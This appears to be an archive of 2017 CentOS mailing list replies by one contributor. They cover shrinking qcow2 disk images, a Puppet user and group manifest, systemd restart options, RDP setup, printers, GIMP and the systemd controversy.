root 2015 1341 0 11:48 pts/0 00:00:00 grep --color=auto puppet 

Earlier ps .. also reported 
puppet 1355 1166 3 11:26 ? 00:00:01 Passenger AppPreloader: 
/usr/share/puppet/rack/puppetmasterd 

And, the "bottom line", puppet agent -t on a client works. It reports finishing 
the catalog run and the client's yaml files on puppetmaster are up to date. 

Is there a command to tell systemd to re-scan running state and update its 
understanding on what it finds? I tried systemctl daemon-reload just to be sure 
that didn't solve the problem before posting this. 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] claiming unsused space back

[Leroy Tennison]

I should have been more specific (and maybe ask "Are you seeing something 
different?")  Admittedly, Ubuntu 16.04 LTS, but the qemu-img man page says for 
resize (What does the CentOS7 man page say?):

resize filename [+ | -]size
   Change the disk image as if it had been created with size.

   Before using this command ... (warning about doing guest resizing 
first)

   After using ... (somewhat different message about guest resizing)

No mention that shrinking only works with raw, not qcow2.  Similar issue with 
virsh blockresize.  I probably should have been more clear that the issue isn't 
commands or just command options, but significant limitations in scope for some 
of those options.

- Original Message -
From: "Johnny Hughes" <joh...@centos.org>
To: "centos" <centos@centos.org>
Sent: Tuesday, August 1, 2017 6:31:14 AM
Subject: Re: [CentOS] claiming unsused space back

On 07/31/2017 05:27 PM, Leroy Tennison wrote:
> As has already been mentioned, some commands (or command options) are only 
> supported on later releases, the man pages don't say this.  Does anyone know 
> of a source of information listing the command, option and version it is 
> implemented in?  That alone would be a great help.
> 
> - Original Message -
> From: "Chris Adams" <li...@cmadams.net>
> To: "centos" <centos@centos.org>
> Sent: Monday, July 31, 2017 11:45:20 AM
> Subject: Re: [CentOS] claiming unsused space back
> 
> Once upon a time, Warren Young <war...@etr-usa.com> said:
>> Zeroing the free space not only prevents inclusion of these discarded FS 
>> blocks, they compress better, too.
> 
> Check out the "virt-sparsify" command - it does all of this for you.
> 

Yes .. just run man on the machine in question.  That has the commands
for the man for the version of software installed on that specific machine.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] claiming unsused space back

[Leroy Tennison]

As has already been mentioned, some commands (or command options) are only 
supported on later releases, the man pages don't say this.  Does anyone know of 
a source of information listing the command, option and version it is 
implemented in?  That alone would be a great help.

- Original Message -
From: "Chris Adams" 
To: "centos" 
Sent: Monday, July 31, 2017 11:45:20 AM
Subject: Re: [CentOS] claiming unsused space back

Once upon a time, Warren Young  said:
> Zeroing the free space not only prevents inclusion of these discarded FS 
> blocks, they compress better, too.

Check out the "virt-sparsify" command - it does all of this for you.
-- 
Chris Adams 
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] claiming unsused space back

[Leroy Tennison]

Interesting, thanks, my situation was (obviously) using NTFS.  I should add 
clarification that, although a qcow[2] to qcow[2] convert will reclaim the 
zeroed space, it does nothing to change the virtual size (qemu-img info ...) so 
the image can grow back to that size.  Currently (on long term support 
distributions) you need to convert to raw, use qemu-resize to reduce the 
physical file size then convert back to qcow2 to get an adjusted virtual size.

- Original Message -
From: "Ruttkay Vladimir" <vladimir.rutt...@telekom.sk>
To: "centos" <centos@centos.org>
Sent: Monday, July 31, 2017 9:54:27 AM
Subject: Re: [CentOS] claiming unsused space back

If you are using XFS - there is mount option "discard|nodiscard"

From XFS man page:

discard|nodiscard
  Enable/disable the issuing of commands to let the block device 
reclaim space freed by the filesystem.  This is useful for SSD devices, thinly 
provisioned LUNs and virtual machine images, but may have a performance impact.

  Note:  It  is  currently  recommended that you use the fstrim 
application to discard unused blocks rather than the discard mount option 
because the performance impact of this option is quite severe.  For this 
reason, nodiscard is the default.

Vladimir


-Original Message-
From: CentOS [mailto:centos-boun...@centos.org] On Behalf Of Leroy Tennison
Sent: Monday, July 31, 2017 4:42 PM
To: centos <centos@centos.org>
Subject: Re: [CentOS] claiming unsused space back

You're right, there's a procedure following it, once the space is zeroed 
qemu-img will recognize it as such and will eliminate it when 'convert' is 
used.  Apparently Fedora qemu has some better capabilities to shrink partitions 
but they haven't made it to "long term support" distributions yet.  For now, 
what has to be done to shrink qcow[2] partitions (raw works) is (regardless of 
client OS, for Windows defragment is first used followed by resizing the 
partitions in Disk Management then finally Sysinternals' sdelete to zero disk 
space - I have used this process and it works but with surprises): defragment 
(even Linux, look into e2defrag, shake, a defrag script or e4defrag - can be 
found on the web, haven't used them, YMMV), zero disk space, resize the 
partition, then use qemu-img to convert to raw (or even qcow - it works).  
However, to permanently resize you must convert to raw, shrink and re-convert 
to qcow2 if you want those capabilities.

- Original Message -
From: "Fred Smith" <fre...@fcshome.stoneham.ma.us>
To: "centos" <centos@centos.org>
Sent: Monday, July 31, 2017 8:50:57 AM
Subject: Re: [CentOS] claiming unsused space back

On Mon, Jul 31, 2017 at 08:28:49AM -0500, Leroy Tennison wrote:
> I realize this is wandering off-topic but, if you have found Debian commands, 
> you're doing better than me.  What are they?  Also, are you allowing dd to 
> totally fill the partition (what I have found on the web as a 
> recommendation)?  If so, is the OS surviving acceptably?
> 
> - Original Message -
> From: "Miguel González" <miguel_3_gonza...@yahoo.es>
> To: "centos" <centos@centos.org>
> Sent: Saturday, July 29, 2017 5:11:33 AM
> Subject: [CentOS] claiming unsused space back
> 
> Hi,
> 
>  I´m running a CentOS server in a VPS. Backups of the VPS take quite
> much space if I don´t claim unused space.
> 
>  Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file
> to claim that unused space. Any automatic way of doing a similar thing
> in CentOS? I have googled for it but I have only found Debian commands.
> 
>  Thanks in advance!

I may be blind, but I don't seehow that technique can "reclaim" any space.
all it does is fill up all the space not allocated to other files by creating
one large file that occupies all otherwise unused disk space.

presumably you'll delete that file once it is created, but you won't have
any more free disk space than you had before. the only difference will be
that that unused space will then be filled with zeroes.

what are you actually wanting to do here?


-- 
 Fred Smith -- fre...@fcshome.stoneham.ma.us -
  The eyes of the Lord are everywhere, 
keeping watch on the wicked and the good.
- Proverbs 15:3 (niv) -
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] claiming unsused space back

[Leroy Tennison]

You're right, there's a procedure following it, once the space is zeroed 
qemu-img will recognize it as such and will eliminate it when 'convert' is 
used.  Apparently Fedora qemu has some better capabilities to shrink partitions 
but they haven't made it to "long term support" distributions yet.  For now, 
what has to be done to shrink qcow[2] partitions (raw works) is (regardless of 
client OS, for Windows defragment is first used followed by resizing the 
partitions in Disk Management then finally Sysinternals' sdelete to zero disk 
space - I have used this process and it works but with surprises): defragment 
(even Linux, look into e2defrag, shake, a defrag script or e4defrag - can be 
found on the web, haven't used them, YMMV), zero disk space, resize the 
partition, then use qemu-img to convert to raw (or even qcow - it works).  
However, to permanently resize you must convert to raw, shrink and re-convert 
to qcow2 if you want those capabilities.

- Original Message -
From: "Fred Smith" <fre...@fcshome.stoneham.ma.us>
To: "centos" <centos@centos.org>
Sent: Monday, July 31, 2017 8:50:57 AM
Subject: Re: [CentOS] claiming unsused space back

On Mon, Jul 31, 2017 at 08:28:49AM -0500, Leroy Tennison wrote:
> I realize this is wandering off-topic but, if you have found Debian commands, 
> you're doing better than me.  What are they?  Also, are you allowing dd to 
> totally fill the partition (what I have found on the web as a 
> recommendation)?  If so, is the OS surviving acceptably?
> 
> - Original Message -
> From: "Miguel González" <miguel_3_gonza...@yahoo.es>
> To: "centos" <centos@centos.org>
> Sent: Saturday, July 29, 2017 5:11:33 AM
> Subject: [CentOS] claiming unsused space back
> 
> Hi,
> 
>  I´m running a CentOS server in a VPS. Backups of the VPS take quite
> much space if I don´t claim unused space.
> 
>  Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file
> to claim that unused space. Any automatic way of doing a similar thing
> in CentOS? I have googled for it but I have only found Debian commands.
> 
>  Thanks in advance!

I may be blind, but I don't seehow that technique can "reclaim" any space.
all it does is fill up all the space not allocated to other files by creating
one large file that occupies all otherwise unused disk space.

presumably you'll delete that file once it is created, but you won't have
any more free disk space than you had before. the only difference will be
that that unused space will then be filled with zeroes.

what are you actually wanting to do here?


-- 
 Fred Smith -- fre...@fcshome.stoneham.ma.us -
  The eyes of the Lord are everywhere, 
keeping watch on the wicked and the good.
- Proverbs 15:3 (niv) -
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] claiming unsused space back

[Leroy Tennison]

I realize this is wandering off-topic but, if you have found Debian commands, 
you're doing better than me.  What are they?  Also, are you allowing dd to 
totally fill the partition (what I have found on the web as a recommendation)?  
If so, is the OS surviving acceptably?

- Original Message -
From: "Miguel González" 
To: "centos" 
Sent: Saturday, July 29, 2017 5:11:33 AM
Subject: [CentOS] claiming unsused space back

Hi,

 I´m running a CentOS server in a VPS. Backups of the VPS take quite
much space if I don´t claim unused space.

 Currently I´m using dd if=/dev/zero of=/mytempfile and remove that file
to claim that unused space. Any automatic way of doing a similar thing
in CentOS? I have googled for it but I have only found Debian commands.

 Thanks in advance!

 Miguel
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] What RH-like on a Dell XPS 15 (9590)?

[Leroy Tennison]

And, if Ubuntu isn't pariah, even it's LTS has a reasonably current kernel.  
However, the "Debian way" (Debian, Ubuntu, others) is enough different than the 
"Red Hat way" (RHEL, CentOS, SuSE more or less) that, if it's important to you, 
stick with the RPM-based options.

- Original Message -
From: "Mike McCarthy, W1NR" 
To: "centos" 
Sent: Thursday, July 27, 2017 4:01:18 PM
Subject: Re: [CentOS] What RH-like on a Dell XPS 15 (9590)?

I would go with Fedora or OpenSUSE latest if you want RH like on that
hardware. There is nothing that unstable about them other than losing
updates and maintenance after 2 years and having to upgrade.

Another choice is to run Virtualbox on the Windows that shipped with the
laptop and run a CentOS 7 virtual guest.

If you REALLY need RHEL (CentOS) running on the hardware I would return
the XPS and get a Lattitude or Precision laptop. They have much better
Linux support as they tend to be more stability oriented rather than
latest and greatest hardware.

Mike

On 07/27/2017 01:25 PM, wwp wrote:
> Hello there,
>
>
> I've just got a Dell XPS 15 (9590) at work and need to set up a stable
> GNU/Linux system on it. I thought of CentOS7, but.. obviously its
> kernel can't run on this hardware.
>
> What would you recommend? Waiting for CentOS8 is not an option unless
> it's a question of few weeks. Are there respins of the CentOS7 DVDs w/
> more top-recent kernels? I'm know of Fedora 26 or course, and not
> willing to switch to Ubuntu 16.10 at all.
>
>
> Regards,
>
>
>
> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos



___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] getting rid of hp c3180

[Leroy Tennison]

Another vote for Brother printer Linux support, an MFC8510DN (and we haven't 
had issues with it either).

- Original Message -
From: "Fred Smith" 
To: "centos" 
Sent: Tuesday, July 11, 2017 11:34:05 PM
Subject: Re: [CentOS] getting rid of hp c3180

On Tue, Jul 11, 2017 at 04:09:15PM -0700, John R Pierce wrote:
> On 7/11/2017 3:58 PM, Fred Smith wrote:
> >I faced the same issue some years ago, and found a low-priced mono
> >laser that lated me quite a few years. no color, but few thing I
> >wanted to print actually demanded color.
> 
> my last two laser printers have been Brother black all-in-ones
> ("MFC").   *VERY* cheap per page printing costs, even if you use
> Brother brand toner cartridges.   They make useful copy machines,
> they are fast (22 page per minute, very short first page warmup).
> The newer one we now have does double sided scanning, and double
> sided printing.   Both of these are ethernet/network printers.
> decent linux support for printing.   the scanner function can direct
> email scans in PDF or JPG format, so there's no need for linux
> drivers for scanning.

I can second the Brother printers. My original one (HL-2070N)
was supported well by one of the free printer drivers already
available on Linux. More recently we have a MFC that works great
with the Brother drivers for Linux.

-- 
---
Under no circumstances will I ever purchase anything offered to me as
the result of an unsolicited e-mail message. Nor will I forward chain
letters, petitions, mass mailings, or virus warnings to large numbers
of others. This is my contribution to the survival of the online
community.
 --Roger Ebert, December, 1996
- The Boulder Pledge -
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Extreme frustration with GIMP

[Leroy Tennison]

Well, I mis-spoke, Ctrl-Z can undo some things, not others.  Sorry.

- Original Message -
From: "Leroy Tennison" <le...@datavoiceint.com>
To: "centos" <centos@centos.org>
Sent: Friday, July 7, 2017 12:38:17 PM
Subject: Re: [CentOS] Extreme frustration with GIMP

I saw Fred's later reply and am glad someone knew how to do it.  I feel your 
pain, the gimp documentation isn't always the best.  If you aren't already 
aware, when your work is suddenly undone, remember that Ctrl-Z (UnDo) is your 
friend.  I found that I had to look for gimp tutorials on the web wherever I 
could and use the one that worked (as you discovered - not all do).  And then 
there were cases where, like you did, posting on a forum produced far better 
results than hours of web search.

- Original Message -
From: "Alice Wonder" <al...@domblogger.net>
To: "centos" <centos@centos.org>
Sent: Friday, July 7, 2017 11:42:01 AM
Subject: [CentOS] Extreme frustration with GIMP

I am not a graphics person. Also can't afford to hire one.

Trying to follow instructions at 
https://docs.gimp.org/en/gimp-tutorial-quickie-separate.html

I use the "intelligent scissors" just like they say, spend quite a bit 
of effort doing so.

Then click the foreground select tool - just like they say - and 
suddenly everything I did with the intelligent tool is undone.

WTF?

Does anyone know of an actual GIMP tutorial for removing background that 
doesn't cause me to throw a damn brick through my monitor?

Photoshop makes it easy, but clearly GIMP developers have a completely 
different philosophy on how a graphics tool should work and I can't 
figure out what their philosophy is.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Extreme frustration with GIMP

[Leroy Tennison]

I saw Fred's later reply and am glad someone knew how to do it.  I feel your 
pain, the gimp documentation isn't always the best.  If you aren't already 
aware, when your work is suddenly undone, remember that Ctrl-Z (UnDo) is your 
friend.  I found that I had to look for gimp tutorials on the web wherever I 
could and use the one that worked (as you discovered - not all do).  And then 
there were cases where, like you did, posting on a forum produced far better 
results than hours of web search.

- Original Message -
From: "Alice Wonder" 
To: "centos" 
Sent: Friday, July 7, 2017 11:42:01 AM
Subject: [CentOS] Extreme frustration with GIMP

I am not a graphics person. Also can't afford to hire one.

Trying to follow instructions at 
https://docs.gimp.org/en/gimp-tutorial-quickie-separate.html

I use the "intelligent scissors" just like they say, spend quite a bit 
of effort doing so.

Then click the foreground select tool - just like they say - and 
suddenly everything I did with the intelligent tool is undone.

WTF?

Does anyone know of an actual GIMP tutorial for removing background that 
doesn't cause me to throw a damn brick through my monitor?

Photoshop makes it easy, but clearly GIMP developers have a completely 
different philosophy on how a graphics tool should work and I can't 
figure out what their philosophy is.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] systemd services and Restart?

[Leroy Tennison]

Although not on CentOS, I've been forced to use it with serial-getty@.service 
(even after enabling and starting it) to get the OS to display a console prompt 
after an OS upgrade.  In this case I used Restart=on-success and RestartSec=5 
(the latter an arbitrary value) because agetty exited after the first console 
disconnect.


- Original Message -
From: "James Pearson" 
To: "centos" 
Sent: Wednesday, June 28, 2017 7:54:43 AM
Subject: [CentOS] systemd services and Restart?

I've been trying out the Restart= option in some of my own systemd 
service unit files - which appears to work fine

However, I notice that this option is only used in a few OS provided 
service unit files - and was wondering about the wisdom of adding this 
capability to other daemons/services? (e.g. chronyd or ntpd, crond, 
rpcbind, etc, etc) - not that these daemons are likely to crash and need 
restarting that often ...

Previously, I've used custom scripts to monitor the state of key daemons 
and restart or report their status as appropriate - but as systemd has 
'Restart' and 'OnFailure' capabilities build in, these options could 
potentially make (my) life a bit easier ...

Are there any potential pit-falls in using Restart with OS provided 
daemons/services?

Thanks

James Pearson
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] RDP for Centos 7

[Leroy Tennison]

One thing I've had to do in Windows (in addition to the firewall change) is 
uncheck "Allow connections only from computers running Remote Desktop with 
Network Level Authentication" (in System->Remote).

- Original Message -
From: "Scott Robbins" 
To: "centos" 
Sent: Thursday, June 22, 2017 12:13:54 PM
Subject: Re: [CentOS] RDP for Centos 7

On Thu, Jun 22, 2017 at 05:48:57PM +0100, Rehabilitation Village Farms Coop 
wrote:
> Pls can someone tell me how to setup rdp and how it is used. Is there any
> step by step guide. Thank you

There's not much to it. It's the remote desktop protocol that you use to
access Windows servers.  On Windows you open port 3387 or allow RDP in some
other way. (I do almost no Windows, so I don't remember exactly, but I
think on servers, there's something in the Windows firewall that you can
allow.)

You then install freerdp. There are other things that will work, but this
is keeping it simple.

This site gives a brief explanation.

https://www.server-world.info/en/note?os=CentOS_7=x=5


You should be able to google for something like use CentOS-6 (or 7) connect
to Windows RDP and find various tutorials.


-- 
Scott Robbins
PGP keyID EB3467D6
( 1B48 077D 66F6 9DB0 FDC2 A409 FA54 EB34 67D6 )
gpg --keyserver pgp.mit.edu --recv-keys EB3467D6

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] C7, systemd, say what?!

[Leroy Tennison]

I was sorely tempted to post saying I would initiate an empty email to the list 
in a week with subject systemd and see what the response would be - I'll 
refrain...

- Original Message -
From: "m roth" 
To: "centos" 
Sent: Thursday, June 8, 2017 9:32:57 AM
Subject: Re: [CentOS] C7, systemd, say what?!

Mark Haney wrote:
> On 06/08/2017 09:12 AM, Andrew Holway wrote:
>> I think we had enough of Systemd flaming last month. Please stop
>> polluting my inbox and find an operating system compatible with your
>> worldview. It is really tiresome to keep on hearing about it.
>>
> Huh. Okay, though I'm not sure when you became arbiter of this list.  If
> you don't like 'our worldview' discussions, maybe you need to find a
> different OS that suits your childish attitude.  Like Windows 95.
>
> Mailing lists now are so full of children it's hard to even use them.
> Maybe you should leave IT if heated discussions make you uncomfortable.

Folks, I'm the one who made the original annoyed throwaway remark. I've
even asked that we end the incipient flamewar. Look, as much as I dislike
systemd, going on and on and on just ain't of interest. Hell, I'll
probably skim and delete, or just delete.

Now, the information that someone posted about what might be happening to
cause my original question was helpful, and in *that* context, in the same
email, cmts about systemd, sure. But I dunno 'bout most of you, but a
flamewar that runs for *weeks*, as we've seen here, is of no interest.

Maybe we need another mailing list, like alt.religion.editors*, we could
have alt.religion.systemd 

  mark

* vi, not emacs! Nya

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] PUPPET - group IDS

[Leroy Tennison]

I'm not familiar with the syntax you're using but the below worked for me using 
'puppet apply grp-usr.pp' on my laptop where grp-usr.pp contained:

group { 'poc':
ensure  =>  present,
gid =>  '1002'
}

user { 'one':
ensure  =>  present,
uid =>  '1005',
gid =>  '1002',
require =>  Group['poc']
}

user { 'two':
ensure  =>  present,
uid =>  '1006',
gid =>  '1002',
require =>  Group['poc']
}

The run produced no errors and

grep poc /etc/group

produced:

poc:x:1002:

with

egrep 'one|two' /etc/passwd

producing (with a couple of extraneous entries):

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
whoopsie:x:109:116::/nonexistent:/bin/false
two:x:1006:1002::/home/two:
one:x:1005:1002::/home/one:



- Original Message -
From: "Paul Heinlein" 
To: "centos" 
Sent: Wednesday, April 19, 2017 4:20:08 PM
Subject: Re: [CentOS] PUPPET - group IDS

On Wed, 19 Apr 2017, Ian Diddams wrote:

> hope thus comes under the remit of this mailking list...
>
>
>
> We use puppet, and Im trying to come up with "code" that will create two user 
> accounts with a shared groiup ID
> eg 
> user1 with UID 1000user 2 with UID 1001
> but I would like them BOTH to share the GID of 2000
> I've tried the following
> accounts::groups:    jointgroup:        gid: '2000'
> accounts::users:
>     user1:        uid: '1000'        gid: '2000'        home: '/home/user1'   
>      shell: '/bin/bash'        password: ''
>     user2:        uid: '1001'        gid: '200'        home: '/home/user2'    
>     shell: '/bin/bash'        password: ''
> But when I trfy and use this puppet agent -tv complains when trying to create 
> user2 that GID 2000 is slready used .
>
> how may I manage this?

I haven't used the "allowdupe" option, so I don't know if it works for 
GIDs, but supposedly this works:

   user { 'user1':
 uid => 1000, gid => 2000, ...,
 allowdupe => true
   }

   user { 'user2':
 uid => 1001, gid => 2000, ...,
 allowdupe => true
   }

In YAML-ese, I guess you'd just add

accounts::users:
   user1:
 allowdupe: 'true'

-- 
Paul Heinlein <> heinl...@madboa.com <> http://www.madboa.com/
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] humor (was Re: OT: systemd Poll)

[Leroy Tennison]

Speaking of vi, I'm amazed at just how powerful it is.  (And I'm not being 
sarcastic, there's not much I've searched for in regard to its capabilities 
that I haven't found).  No thread drift here...

- Original Message -
From: "m roth" 
To: "centos" 
Sent: Wednesday, April 12, 2017 1:08:25 PM
Subject: Re: [CentOS] humor (was Re: OT: systemd Poll)

Andrew Holway wrote:
>>
>> Of course, to be fair, there may have been a *reason* for not doing it
>> that way before
>>
> Between the early 1990's and early 2000's the price of a GB of memory went
> from ~$100,000 to ~$1000*. I guess a lot of the design decisions made for
> things like init were focussed on this. In 1995 is was common for server
> platforms to have 32Mb ram whereas the kernel alone in my PC here at home
> is consuming just over 500MB. It seems reasonable that software components
> built in 1997 will not be fit for purpose in 2017.
>
> * According to perfunctory google search:
> http://www.statisticbrain.com/average-historic-price-of-ram/

a) I was speaking in much more general terms than just software.
b) Stuff built then will run unbelievable fast on modern systems - and no,
in the nineties,
  we were not manually swapping.
c) If it fulfils its intended purpose, why would you redefine it as not
fit for that
  purpose?
d) And then there stuff that I'm not sure of the purpose... like eclipse,
that
  needs 2GB to run... for an editor.

  mark "my web pages proudly built in vi!"

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] OT: systemd Poll

[Leroy Tennison]

Why don't we discuss something ***less*** controversial, 
like politics or religion?

- Original Message -
From: "Karanbir Singh" 
To: "centos" 
Sent: Wednesday, April 12, 2017 6:19:43 AM
Subject: Re: [CentOS] OT: systemd Poll

On 09/04/17 05:39, Anthony K wrote:
> So, at which stage are you in w/ regards to adopting systemd?  Are you
> still ridiculing it, violently opposed to it, or have you mellowed to it?

I think the points been made, can we all move along and let this thread be.

-- 
Karanbir Singh
+44-207-0999389 | http://www.karan.org/ | twitter.com/kbsingh
GnuPG Key : http://www.karan.org/publickey.asc
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] OT: systemd Poll

[Leroy Tennison]

Interesting that you should cite Stallman because freedom is an issue here, 
we've been reduced to Microsoft when it comes to init.  We've lost most of our 
flexibility with no option to choose piecemeal what we want and don't want.

- Original Message -
From: "Andrew Holway" 
To: "centos" 
Sent: Tuesday, April 11, 2017 9:50:02 AM
Subject: Re: [CentOS] OT: systemd Poll

>
>  I'd much rather have a bash script to look at-- and manually step through.


Is that a joke? Bash is an almighty impenetrable nightmare. I've been doing
*nix for nearly 10 years and *still* am unable to read anything vaguely
complicated in bash whereas I can write fairly decent python after 6
months. From my point of view SystemD is amazing I can write a 6 line
service file for my apps and it *just works* and I don't have to think
about it anymore.

What is it about SystemD that brings out the Richard Stallman in everyone?
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] OT: systemd Poll

[Leroy Tennison]

Interesting, I'm going to have to look into this.

- Original Message -
From: "Jonathan Billings" <billi...@negate.org>
To: "centos" <centos@centos.org>
Sent: Tuesday, April 11, 2017 8:32:49 AM
Subject: Re: [CentOS] OT: systemd Poll

On Tue, Apr 11, 2017 at 08:02:56AM -0500, Leroy Tennison wrote:
> This does concern me, another post referred to the heavy-handed way
> in which systemd has been implemented and I totally agree.  "You
> will conform" - no exceptions.  What I fear is that we will lose the
> ability to control the name, MAC address association at some future
> point because "no one needs to do that" (speaking from their ivory
> tower). 

To be honest, if you use systemd-networkd (instead of NM or the network init
script), you can arbitrarily name your interfaces whatever you want, in a much
more configuration-management-friendly way.

It's just that systemd-networkd isn't that well-known yet.  I'm on the fence
about whether I like it or not.  It is nice that its really simple files and
consistent across distros, but it doesn't yet do stuff like wifi well.  Also,
most GNOME desktops have a NM applet that gets confused if you're using
systemd-networkd.  I still feel like systemd-networkd is a lot less
convoluted than NetworkManager.

https://www.freedesktop.org/software/systemd/man/systemd-networkd.service.html

-- 
Jonathan Billings <billi...@negate.org>
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] OT: systemd Poll

[Leroy Tennison]

Another huge concern: It breaks, someone else has to fix it because it's in the 
C source - after it reaches a high enough priority.  At least with scripts you 
could conceivably hack it.  From what I've read there is some ability to get 
systemd to defer to a script, I'm going to have to become an expert at that.

- Original Message -
From: "Bruce Ferrell" 
To: "centos" 
Sent: Monday, April 10, 2017 7:13:55 PM
Subject: Re: [CentOS] OT: systemd Poll

On 04/10/2017 03:20 PM, Pete Biggs wrote:
>> I must admit that I skipped through the first and second stages - I
>> never found creating init scripts a joy and instead opted to write my
>> own scripts that I launched via inittab.  As such, I welcomed the
>> simplicity systemd's service files without fuss.
>>
>> So, at which stage are you in w/ regards to adopting systemd?  Are you
>> still ridiculing it, violently opposed to it, or have you mellowed to it?
>>
> It is what it is.
>
> I can see that systemd may not look as straightforward as init scripts,
> but it has been clear for a while that SysVinit is generally not really
> fit-for-purpose. Things like the mystic incantations embedded in
> comments at the top to try and make chkconfig work properly, or the
> lack of a consistent approach to configuring parameters (are they
> embedded in the script? In /etc/sysconfig? The package's own config
> files?).
>
> The fact that there was at one point multiple solutions to the problem
> (with systemd eventually becoming the accepted one) and that no dev is
> really going to voluntarily go through the pain and abuse of
> implementing something new like this shows that it really was thought
> to be necessary.
>
> I think what is/was the issue is the abrasive way that some of it was
> done. It seems to have put people's backs up no end and makes them
> predisposed to find fault with it.
>
> It's just different, that's all. It does the job it was designed to do.
> It even copes with legacy init scripts, so you can still use them if
> you want.
>
> And I remember when these new fangled init scripts first appeared - boy
> did everyone find them confusing and hated them.
>
> P.
>

My first *IX system had only /etc/inittab and I had to manually add and 
configure inetd. Next generation used the bsd init system... Monolithic.  No 
process start/stop, but I 
understood it. Then SystemV came along; Individual processes could be started, 
stopped, and queried. The came the function file and THAT was a complete 
mess... Every distro 
developer had his own idea of what functions were needed.

In all three of those cases, there was a single, simple start up entity.  That 
was the literal binary program init.  It read /etc/inittab and used that to 
handle process management 
and those management processes were completely transparent.  Standardized, well 
known locations were used.  It was considered to be a not just good practice, 
but excellent practice 
to do so.  It wasn't commonly done, but it was relatively simple to swap 
between them too.

The current crop of system initialization systems, do everything possible to 
obscure the details of operation...  Boot status on the console?  Nope, 
obscured. Processes logged to 
standard places? Nope, someone might hijack the logs (we had a technique for 
that... remote logging, but that isn't important enough to make work... Too 
much trouble).

The bottom line seems to be, "I've looked at this, and I know better than 20, 
30 years of experience, so throw it all out and do it my way"... And if things 
get broken in the 
process... Oh well, that's progress.

I've had my init system lose communication with the desktop gui and decide to 
reboot my system.  Yes, systemd did that.  dbus got an upgrade and was 
restarting so systemd rebooted 
my system.

While not directly a systemd problem, I've haddistro builds of apache that 
didn't work because of some patch "needed" so systemd could manage apache (We 
need systemd hooked so 
deeply into every process now?!).  Yes, each of these was corrected... But they 
didn't need to happen and NEVER happened with earlier init systems.

The concepts in upstart, launchd, and systemd are mildly interesting to me and 
probably more so to others.  The implementations of the ideas have been poorly 
thought out and 
tested. They cause so much trouble for me as to make them worthless to me. When 
complaints are registered, the response has often been "if we don't force it, 
it will never be 
tested".  Completely unacceptable.

This is MY issue with the new shiny toy.  Heedless and needless system breakage 
by an escaped lab rat.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos